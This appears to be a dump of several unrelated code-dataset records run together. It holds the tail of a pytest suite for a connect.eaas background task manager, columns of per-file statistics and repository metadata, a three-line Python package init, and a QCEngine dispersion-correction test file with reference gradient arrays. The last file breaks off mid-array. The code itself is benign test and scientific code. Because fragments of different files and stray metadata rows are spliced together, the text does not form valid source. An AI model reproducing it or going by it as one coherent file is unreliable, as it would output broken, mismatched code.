    mocker.patch.object(
        ExtensionHandler,
        'capabilities',
        new_callable=mocker.PropertyMock(
            return_value={TaskType.PART_USAGE_FILE_REQUEST_PROCESSING: ['pending']},
        ),
    )
    mocker.patch('connect.eaas.handler.get_extension_class')
    mocker.patch('connect.eaas.handler.get_extension_type')
    handler = ExtensionHandler(config)
    handler.extension_class = extension_cls(
        TASK_TYPE_EXT_METHOD_MAP[TaskType.PART_USAGE_FILE_REQUEST_PROCESSING],
        async_impl=True,
    )
    handler.extension_type = 'async'
    queue_put = mocker.patch.object(asyncio.Queue, 'put')
    manager = BackgroundTasksManager(config, handler, queue_put)
    chunk_payload = {'id': 'UFC-000', 'status': 'pending'}
    # First the count-only status filter, then the retrieve call.
    httpx_mock.add_response(
        method='GET',
        url=(
            f'{api_url}/usage/chunks?'
            'and(eq(id,UFC-000),in(status,(pending)))&limit=0&offset=0'
        ),
        json=[],
        headers={'Content-Range': 'items 0-0/1'},
    )
    httpx_mock.add_response(
        method='GET',
        url=f'{api_url}/usage/chunks/UFC-000',
        json=chunk_payload,
    )
    task = TaskPayload(
        **task_payload(
            TaskCategory.BACKGROUND, TaskType.PART_USAGE_FILE_REQUEST_PROCESSING, 'UFC-000',
        ),
    )
    assert await manager.get_argument(task) == chunk_payload
@pytest.mark.asyncio
@pytest.mark.parametrize(
    ('task_type', 'status_field', 'endpoint'),
    (
        (TaskType.ASSET_PURCHASE_REQUEST_PROCESSING, 'status', '/requests'),
        (TaskType.ASSET_CHANGE_REQUEST_PROCESSING, 'status', '/requests'),
        (TaskType.ASSET_SUSPEND_REQUEST_PROCESSING, 'status', '/requests'),
        (TaskType.ASSET_RESUME_REQUEST_PROCESSING, 'status', '/requests'),
        (TaskType.ASSET_CANCEL_REQUEST_PROCESSING, 'status', '/requests'),
        (TaskType.ASSET_ADJUSTMENT_REQUEST_PROCESSING, 'status', '/requests'),
        (TaskType.TIER_CONFIG_SETUP_REQUEST_PROCESSING, 'status', '/tier/config-requests'),
        (TaskType.TIER_CONFIG_CHANGE_REQUEST_PROCESSING, 'status', '/tier/config-requests'),
        (TaskType.TIER_CONFIG_ADJUSTMENT_REQUEST_PROCESSING, 'status', '/tier/config-requests'),
        (TaskType.LISTING_NEW_REQUEST_PROCESSING, 'state', '/listing-requests'),
        (TaskType.LISTING_REMOVE_REQUEST_PROCESSING, 'state', '/listing-requests'),
        (TaskType.TIER_ACCOUNT_UPDATE_REQUEST_PROCESSING, 'status', '/tier/account-requests'),
        (TaskType.USAGE_FILE_REQUEST_PROCESSING, 'status', '/usage/files'),
        (TaskType.PART_USAGE_FILE_REQUEST_PROCESSING, 'status', '/usage/chunks'),
    ),
)
async def test_get_argument_unsupported_status(
    mocker, httpx_mock, extension_cls,
    config_payload, task_payload, unused_port,
    task_type, status_field, endpoint,
):
    """get_argument skips the task when the object's status is unsupported.

    For every background task type (each with its endpoint and status field
    name), a count-filter total of 0 means the object is not in a supported
    status: ``None`` is returned and a skip response is sent.
    """
    # Provide a complete fake runtime environment so ConfigHelper can be built.
    mocker.patch(
        'connect.eaas.config.get_environment',
        return_value={
            'ws_address': f'127.0.0.1:{unused_port}',
            'api_address': f'127.0.0.1:{unused_port}',
            'api_key': 'SU-000:XXXX',
            'environment_id': 'ENV-000-0001',
            'instance_id': 'INS-000-0002',
            'background_task_max_execution_time': 300,
            'interactive_task_max_execution_time': 120,
            'scheduled_task_max_execution_time': 43200,
        },
    )
    api_url = f'https://127.0.0.1:{unused_port}/public/v1'
    mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
    config = ConfigHelper()
    config.update_dynamic_config(ConfigurationPayload(**config_payload))
    # Only the 'supported' status is declared as processable.
    mocker.patch.object(
        ExtensionHandler,
        'capabilities',
        new_callable=mocker.PropertyMock(
            return_value={task_type: ['supported']},
        ),
    )
    mocker.patch('connect.eaas.handler.get_extension_class')
    mocker.patch('connect.eaas.handler.get_extension_type')
    handler = ExtensionHandler(config)
    handler.extension_class = extension_cls(
        TASK_TYPE_EXT_METHOD_MAP[task_type],
        async_impl=True,
    )
    handler.extension_type = 'async'
    result_queue = mocker.patch.object(asyncio.Queue, 'put')
    manager = BackgroundTasksManager(config, handler, result_queue)
    # Spy on the skip path so the message can be asserted at the end.
    manager.send_skip_response = mocker.MagicMock()
    # Content-Range total of 0: the object does not match the status filter.
    httpx_mock.add_response(
        method='GET',
        url=(
            f'{api_url}{endpoint}?'
            f'and(eq(id,OBJ-000),in({status_field},(supported)))&limit=0&offset=0'
        ),
        json=[],
        headers={'Content-Range': 'items 0-0/0'},
    )
    task = TaskPayload(
        **task_payload(
            TaskCategory.BACKGROUND, task_type, 'OBJ-000',
        ),
    )
    assert await manager.get_argument(task) is None
    manager.send_skip_response.assert_called_once_with(
        task,
        'The request status does not match the supported statuses: supported.',
    )
@pytest.mark.asyncio
async def test_build_response_done(task_payload):
    """A DONE processing result is mapped onto the task response fields."""
    manager = BackgroundTasksManager(ConfigHelper(), None, None)
    task = TaskPayload(
        **task_payload(
            TaskCategory.BACKGROUND, TaskType.PART_USAGE_FILE_REQUEST_PROCESSING, 'UFC-000',
        ),
    )
    outcome = ProcessingResponse.done()
    future = asyncio.Future()
    future.set_result(outcome)
    response = await manager.build_response(task, future)
    assert response.task_id == task.task_id
    assert response.result == outcome.status
@pytest.mark.asyncio
@pytest.mark.parametrize(
    'result',
    (
        ProcessingResponse.fail(output='message'),
        ProcessingResponse.skip(output='message'),
    ),
)
async def test_build_response_fail_skip(task_payload, result):
    """FAIL and SKIP results propagate both their status and their output."""
    manager = BackgroundTasksManager(ConfigHelper(), None, None)
    task = TaskPayload(
        **task_payload(
            TaskCategory.BACKGROUND, TaskType.PART_USAGE_FILE_REQUEST_PROCESSING, 'UFC-000',
        ),
    )
    completed = asyncio.Future()
    completed.set_result(result)
    response = await manager.build_response(task, completed)
    assert response.task_id == task.task_id
    assert response.result == result.status
    assert response.output == result.output
@pytest.mark.asyncio
async def test_build_response_reschedule(task_payload):
    """A RESCHEDULE result carries its countdown into the task response."""
    manager = BackgroundTasksManager(ConfigHelper(), None, None)
    task = TaskPayload(
        **task_payload(
            TaskCategory.BACKGROUND, TaskType.PART_USAGE_FILE_REQUEST_PROCESSING, 'UFC-000',
        ),
    )
    rescheduled = ProcessingResponse.reschedule(countdown=99)
    future = asyncio.Future()
    future.set_result(rescheduled)
    response = await manager.build_response(task, future)
    assert response.task_id == task.task_id
    assert response.result == rescheduled.status
    assert response.countdown == rescheduled.countdown
@pytest.mark.asyncio
async def test_build_response_exception(mocker, task_payload):
    """A task exception maps to a RETRY response and is logged."""
    manager = BackgroundTasksManager(ConfigHelper(), None, None)
    manager.log_exception = mocker.MagicMock()
    task = TaskPayload(
        **task_payload(
            TaskCategory.BACKGROUND, TaskType.PART_USAGE_FILE_REQUEST_PROCESSING, 'UFC-000',
        ),
    )
    failed = asyncio.Future()
    failed.set_exception(Exception('Awesome error message'))
    built = await manager.build_response(task, failed)
    assert built.task_id == task.task_id
    assert built.result == ResultType.RETRY
    assert 'Awesome error message' in built.output
    manager.log_exception.assert_called_once()
@pytest.mark.asyncio
async def test_send_skip_response(mocker, task_payload):
    """send_skip_response marks the task as skipped and enqueues it."""
    queue_put = mocker.AsyncMock()
    # Patch the module's ``time``: keep the real sleep, but feed monotonic()
    # two fixed readings so any elapsed-time bookkeeping is deterministic.
    patched_time = mocker.patch('connect.eaas.managers.background.time')
    patched_time.sleep = time.sleep
    patched_time.monotonic.side_effect = (1.0, 2.0)
    manager = BackgroundTasksManager(ConfigHelper(), None, queue_put)
    task = TaskPayload(
        **task_payload(
            TaskCategory.BACKGROUND, TaskType.PART_USAGE_FILE_REQUEST_PROCESSING, 'UFC-000', 1.0,
        ),
    )
    manager.send_skip_response(task, 'test output')
    # Yield control so the internally scheduled coroutine can run.
    await asyncio.sleep(.01)
    task.result = ResultType.SKIP
    task.output = 'test output'
    queue_put.assert_awaited_once_with(task)
| 32.826827
| 98
| 0.647192
| 3,783
| 32,794
| 5.349194
| 0.05604
| 0.038595
| 0.005782
| 0.040225
| 0.918512
| 0.905268
| 0.880213
| 0.874234
| 0.863758
| 0.840927
| 0
| 0.030755
| 0.222663
| 32,794
| 998
| 99
| 32.859719
| 0.763063
| 0
| 0
| 0.748603
| 0
| 0.013408
| 0.239007
| 0.13722
| 0
| 0
| 0
| 0
| 0.031285
| 1
| 0
| false
| 0
| 0.010056
| 0
| 0.010056
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f408e76faea4f52a7470f9b6a719435a4eb77812
| 77
|
py
|
Python
|
coms/src/coms/__init__.py
|
tylerferrara/coms
|
5070b65836f0ff3538f787e4cbe46203355270ea
|
[
"MIT"
] | null | null | null |
coms/src/coms/__init__.py
|
tylerferrara/coms
|
5070b65836f0ff3538f787e4cbe46203355270ea
|
[
"MIT"
] | 5
|
2022-02-11T00:22:24.000Z
|
2022-02-15T01:31:28.000Z
|
coms/src/coms/__init__.py
|
tylerferrara/coms
|
5070b65836f0ff3538f787e4cbe46203355270ea
|
[
"MIT"
] | null | null | null |
from coms.sim import *
from coms.constants import *
from coms.utils import *
| 19.25
| 28
| 0.766234
| 12
| 77
| 4.916667
| 0.5
| 0.40678
| 0.474576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155844
| 77
| 3
| 29
| 25.666667
| 0.907692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f4689bbde0696cb3c63faedcf15b273645172e1e
| 45,529
|
py
|
Python
|
qcengine/programs/tests/test_dftd3_mp2d.py
|
dotsdl/QCEngine
|
51c7e0bfb28c826923eb38fcec84b9e45e90b3c4
|
[
"BSD-3-Clause"
] | 1
|
2019-10-22T20:28:03.000Z
|
2019-10-22T20:28:03.000Z
|
qcengine/programs/tests/test_dftd3_mp2d.py
|
ChemRacer/QCEngine
|
fcc4cba9a79f494378527eee1c7b218b33189e66
|
[
"BSD-3-Clause"
] | null | null | null |
qcengine/programs/tests/test_dftd3_mp2d.py
|
ChemRacer/QCEngine
|
fcc4cba9a79f494378527eee1c7b218b33189e66
|
[
"BSD-3-Clause"
] | null | null | null |
import copy
import numpy as np
import pytest
import qcelemental as qcel
import qcengine as qcng
from qcelemental.testing import compare, compare_recursive, compare_values, tnm
from qcengine.programs import empirical_dispersion_resources
from qcengine.testing import is_program_new_enough, using_dftd3, using_dftd3_321, using_mp2d, using_psi4, using_qcdb
@using_dftd3
@pytest.mark.parametrize("method", [
    "b3lyp-d3",
    "b3lyp-d3m",
    "b3lyp-d3bj",
    "b3lyp-d3mbj",
])
def test_dftd3_task(method):
    """Run a dftd3 energy computation end-to-end and sanity-check the result."""
    task_input = {
        "molecule": qcng.get_molecule("eneyne"),
        "driver": "energy",
        "model": {"method": method},
    }
    ret = qcng.compute(task_input, "dftd3", raise_error=True, return_dict=True)
    assert ret["driver"] == "energy"
    assert "provenance" in ret
    assert "normal termination of dftd3" in ret["stdout"]
    # Provenance must record the execution context.
    for key in ["cpu", "hostname", "username", "wall_time"]:
        assert key in ret["provenance"]
    assert ret["success"] is True
## Resources
ref = {}
dmm = ['dimer', 'mA', 'mB', 'mAgB', 'gAmB']
ref['eneyne'] = {}
ref['eneyne']['B3LYP-D2'] = dict(zip(dmm, [-0.00390110, -0.00165271, -0.00058118, -0.00165271, -0.00058118]))
ref['eneyne']['B3LYP-D3'] = dict(zip(dmm, [-0.00285088, -0.00084340, -0.00031923, -0.00084340, -0.00031923]))
ref['eneyne']['B3LYP-D3(BJ)'] = dict(zip(dmm, [-0.00784595, -0.00394347, -0.00226683, -0.00394347, -0.00226683]))
ref['eneyne']['PBE-D2'] = dict(zip(dmm, [-0.00278650, -0.00118051, -0.00041513, -0.00118051, -0.00041513]))
ref['eneyne']['PBE-D3'] = dict(zip(dmm, [-0.00175474, -0.00045421, -0.00016839, -0.00045421, -0.00016839]))
ref['eneyne']['PBE-D3(BJ)'] = dict(zip(dmm, [-0.00475937, -0.00235265, -0.00131239, -0.00235265, -0.00131239]))
ref['eneyne']['ATM'] = dict(
zip(dmm, [-0.000000175571, 0.000000216003, -0.000000055859, 0.000000216003, -0.000000055859]))
ref['eneyne']['MP2-DMP2'] = dict(
zip(dmm, [0.00632174635953, 0.00265335573161, 0.00344334929607, 0.00265335573161, 0.00344334929607]))
ref['ne'] = {}
ref['ne']['B3LYP-D3(BJ)'] = {'atom': 0.0}
ref['ne']['MP2-DMP2'] = {'atom': 0.0}
ref['ne']['ATM'] = {'atom': 0.0}
gref = {}
gref['eneyne'] = {}
gref['eneyne']['B3LYP-D2'] = dict(zip(dmm, [
np.array([
0.00000000000000E+00, 0.48816402308826E-03, -0.52644615172697E-03,
0.00000000000000E+00, -0.48816402308826E-03, -0.52644615172697E-03,
-0.73597441492032E-03, -0.91579236339614E-04, -0.84500341812746E-04,
0.73597441492032E-03, -0.91579236339614E-04, -0.84500341812746E-04,
0.73597441492032E-03, 0.91579236339614E-04, -0.84500341812746E-04,
-0.73597441492032E-03, 0.91579236339614E-04, -0.84500341812746E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.49418952404353E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.10115907534998E-02,
0.00000000000000E+00, 0.00000000000000E+00, 0.13962586025551E-02,
0.00000000000000E+00, 0.00000000000000E+00, -0.52276616130647E-03]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.60147644572925E-03, -0.48929640608715E-06,
0.00000000000000E+00, -0.60147644572925E-03, -0.48929640608715E-06,
-0.76078100143016E-03, -0.58483420364762E-04, 0.24464820304358E-06,
0.76078100143016E-03, -0.58483420364762E-04, 0.24464820304358E-06,
0.76078100143016E-03, 0.58483420364762E-04, 0.24464820304358E-06,
-0.76078100143016E-03, 0.58483420364762E-04, 0.24464820304358E-06]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, -0.56705458935397E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.56456483332009E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.53090524837336E-03,
0.00000000000000E+00, 0.00000000000000E+00, -0.52841549233948E-03]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.60147644572925E-03, -0.48929640608715E-06,
0.00000000000000E+00, -0.60147644572925E-03, -0.48929640608715E-06,
-0.76078100143016E-03, -0.58483420364762E-04, 0.24464820304358E-06,
0.76078100143016E-03, -0.58483420364762E-04, 0.24464820304358E-06,
0.76078100143016E-03, 0.58483420364762E-04, 0.24464820304358E-06,
-0.76078100143016E-03, 0.58483420364762E-04, 0.24464820304358E-06,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, -0.56705458935397E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.56456483332009E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.53090524837336E-03,
0.00000000000000E+00, 0.00000000000000E+00, -0.52841549233948E-03]).reshape((-1, 3)),
])) # yapf: disable
gref['eneyne']['B3LYP-D3'] = dict(zip(dmm, [
np.array([
0.67762635780344E-20, 0.19657186672293E-03, -0.23180716200687E-03,
0.50821976835258E-20, -0.19657186672293E-03, -0.23180716200687E-03,
-0.83754349667195E-04, 0.45844828386013E-04, -0.92969637976992E-04,
0.83754349667195E-04, 0.45844828386013E-04, -0.92969637976992E-04,
0.83754349667195E-04, -0.45844828386013E-04, -0.92969637976992E-04,
-0.83754349667195E-04, -0.45844828386013E-04, -0.92969637976992E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.11800508571549E-03,
-0.33881317890172E-20, -0.50821976835258E-20, 0.62302832736499E-03,
0.50821976835258E-20, 0.33881317890172E-20, 0.50037535445493E-03,
0.00000000000000E+00, -0.52939559203394E-22, -0.16990572018272E-03]).reshape((-1, 3)),
np.array([
0.20328790734103E-19, 0.24171499732116E-03, -0.20480842481032E-06,
-0.16940658945086E-20, -0.24171499732116E-03, -0.20480842481032E-06,
-0.10776189540054E-03, 0.78926689997812E-04, 0.10240421240516E-06,
0.10776189540054E-03, 0.78926689997812E-04, 0.10240421240516E-06,
0.10776189540054E-03, -0.78926689997812E-04, 0.10240421240516E-06,
-0.10776189540054E-03, -0.78926689997812E-04, 0.10240421240516E-06]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, -0.21752286612122E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.21634915516554E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.17823532330490E-03,
0.00000000000000E+00, 0.00000000000000E+00, -0.17706161234922E-03]).reshape((-1, 3)),
np.array([
0.20328790734103E-19, 0.24171499732116E-03, -0.20480842481032E-06,
-0.16940658945086E-20, -0.24171499732116E-03, -0.20480842481032E-06,
-0.10776189540054E-03, 0.78926689997812E-04, 0.10240421240516E-06,
0.10776189540054E-03, 0.78926689997812E-04, 0.10240421240516E-06,
0.10776189540054E-03, -0.78926689997812E-04, 0.10240421240516E-06,
-0.10776189540054E-03, -0.78926689997812E-04, 0.10240421240516E-06,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, -0.21752286612122E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.21634915516554E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.17823532330490E-03,
0.00000000000000E+00, 0.00000000000000E+00, -0.17706161234922E-03]).reshape((-1, 3)),
])) # yapf: disable
gref['eneyne']['B3LYP-D3(BJ)'] = dict(zip(dmm, [
np.array([
0.16940658945086E-20, -0.10896372137622E-03, -0.28496931787936E-03,
0.33881317890172E-20, 0.10896372137622E-03, -0.28496931787936E-03,
0.56547183189867E-04, -0.10791733716132E-03, -0.81750328898176E-04,
-0.56547183189867E-04, -0.10791733716132E-03, -0.81750328898176E-04,
-0.56547183189867E-04, 0.10791733716132E-03, -0.81750328898176E-04,
0.56547183189867E-04, 0.10791733716132E-03, -0.81750328898176E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.14698301085008E-03,
-0.16940658945086E-20, -0.33881317890172E-20, 0.43655907696000E-03,
0.00000000000000E+00, 0.33881317890172E-20, 0.23688438591518E-03,
0.00000000000000E+00, -0.52939559203394E-22, 0.76513477626168E-04]).reshape((-1, 3)),
np.array([
-0.33881317890172E-20, -0.54157860939394E-04, 0.11299781801723E-07,
-0.93173624197973E-20, 0.54157860939394E-04, 0.11299781801723E-07,
0.35880725530239E-04, -0.79323052619042E-04, -0.56498909008614E-08,
-0.35880725530239E-04, -0.79323052619042E-04, -0.56498909008614E-08,
-0.35880725530239E-04, 0.79323052619042E-04, -0.56498909008614E-08,
0.35880725530239E-04, 0.79323052619042E-04, -0.56498909008614E-08]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.45552310986933E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.45561218665227E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.69342175541743E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.69351083220036E-04]).reshape((-1, 3)),
np.array([
-0.33881317890172E-20, -0.54157860939394E-04, 0.11299781801723E-07,
-0.93173624197973E-20, 0.54157860939394E-04, 0.11299781801723E-07,
0.35880725530239E-04, -0.79323052619042E-04, -0.56498909008614E-08,
-0.35880725530239E-04, -0.79323052619042E-04, -0.56498909008614E-08,
-0.35880725530239E-04, 0.79323052619042E-04, -0.56498909008614E-08,
0.35880725530239E-04, 0.79323052619042E-04, -0.56498909008614E-08,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.45552310986933E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.45561218665227E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.69342175541743E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.69351083220036E-04]).reshape((-1, 3)),
])) # yapf: disable
gref['eneyne']['PBE-D2'] = dict(zip(dmm, [
np.array([
0.00000000000000E+00, 0.34868860375520E-03, -0.37603298259607E-03,
0.00000000000000E+00, -0.34868860375520E-03, -0.37603298259607E-03,
-0.52569603453084E-03, -0.65413743213220E-04, -0.60357389750118E-04,
0.52569603453084E-03, -0.65413743213220E-04, -0.60357389750118E-04,
0.52569603453084E-03, 0.65413743213220E-04, -0.60357389750118E-04,
-0.52569603453084E-03, 0.65413743213220E-04, -0.60357389750118E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.35299253320442E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.72256485674234E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.99732761854534E-03,
0.00000000000000E+00, 0.00000000000000E+00, -0.37340441789063E-03]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.42962605217439E-03, -0.34949744879114E-06,
0.00000000000000E+00, -0.42962605217439E-03, -0.34949744879114E-06,
-0.54341502569968E-03, -0.41773873586195E-04, 0.17474872439557E-06,
0.54341502569968E-03, -0.41773873586195E-04, 0.17474872439557E-06,
0.54341502569968E-03, 0.41773873586195E-04, 0.17474872439557E-06,
-0.54341502569968E-03, 0.41773873586195E-04, 0.17474872439557E-06]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, -0.40503901078976E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.40326061354193E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.37921805177386E-03,
0.00000000000000E+00, 0.00000000000000E+00, -0.37743965452603E-03]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.42962605217439E-03, -0.34949744879114E-06,
0.00000000000000E+00, -0.42962605217439E-03, -0.34949744879114E-06,
-0.54341502569968E-03, -0.41773873586195E-04, 0.17474872439557E-06,
0.54341502569968E-03, -0.41773873586195E-04, 0.17474872439557E-06,
0.54341502569968E-03, 0.41773873586195E-04, 0.17474872439557E-06,
-0.54341502569968E-03, 0.41773873586195E-04, 0.17474872439557E-06,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, -0.40503901078976E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.40326061354193E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.37921805177386E-03,
0.00000000000000E+00, 0.00000000000000E+00, -0.37743965452603E-03]).reshape((-1, 3)),
])) # yapf: disable
gref['eneyne']['PBE-D3'] = dict(zip(dmm, [
np.array([
0.33881317890172E-20, 0.97730853016389E-04, -0.71901324069440E-04,
0.29646153153901E-20, -0.97730853016389E-04, -0.71901324069440E-04,
-0.31222554291636E-04, 0.29545643062003E-04, -0.67132324795951E-04,
0.31222554291636E-04, 0.29545643062003E-04, -0.67132324795951E-04,
0.31222554291636E-04, -0.29545643062003E-04, -0.67132324795951E-04,
-0.31222554291636E-04, -0.29545643062003E-04, -0.67132324795951E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.20867204655394E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.30651555323142E-03,
0.16940658945086E-20, 0.16940658945086E-20, 0.18769576731255E-03,
0.00000000000000E+00, 0.00000000000000E+00, -0.61012168565887E-04]).reshape((-1, 3)),
np.array([
0.33881317890172E-20, 0.11021182403760E-03, -0.93982803767757E-07,
-0.42351647362715E-21, -0.11021182403760E-03, -0.93982803767758E-07,
-0.48220259417857E-04, 0.52933097691669E-04, 0.46991401883879E-07,
0.48220259417857E-04, 0.52933097691669E-04, 0.46991401883879E-07,
0.48220259417857E-04, -0.52933097691669E-04, 0.46991401883879E-07,
-0.48220259417857E-04, -0.52933097691669E-04, 0.46991401883879E-07]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, -0.99901515312115E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.99340886211351E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.67878928346081E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.67318299245317E-04]).reshape((-1, 3)),
np.array([
0.33881317890172E-20, 0.11021182403760E-03, -0.93982803767757E-07,
-0.42351647362715E-21, -0.11021182403760E-03, -0.93982803767758E-07,
-0.48220259417857E-04, 0.52933097691669E-04, 0.46991401883879E-07,
0.48220259417857E-04, 0.52933097691669E-04, 0.46991401883879E-07,
0.48220259417857E-04, -0.52933097691669E-04, 0.46991401883879E-07,
-0.48220259417857E-04, -0.52933097691669E-04, 0.46991401883879E-07,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, -0.99901515312115E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.99340886211351E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.67878928346081E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.67318299245317E-04]).reshape((-1, 3)),
])) # yapf: disable
# Reference dispersion gradients for PBE-D3(BJ) on the ethene-ethyne system,
# keyed by the fragment labels in `dmm` (defined earlier; presumably
# dimer/mA/mB/mAgB/gAmB — the zero-padded blocks below match the ghosted
# fragments of mAgB and gAmB). Values look like Hartree/Bohr — TODO confirm.
gref['eneyne']['PBE-D3(BJ)'] = dict(zip(dmm, [
    np.array([
        0.00000000000000E+00, -0.61939589939064E-04, -0.16066534797355E-03,
        0.25410988417629E-20, 0.61939589939064E-04, -0.16066534797355E-03,
        0.35330272921363E-04, -0.65816270722009E-04, -0.53748175167354E-04,
        -0.35330272921363E-04, -0.65816270722009E-04, -0.53748175167354E-04,
        -0.35330272921363E-04, 0.65816270722009E-04, -0.53748175167354E-04,
        0.35330272921363E-04, 0.65816270722009E-04, -0.53748175167354E-04,
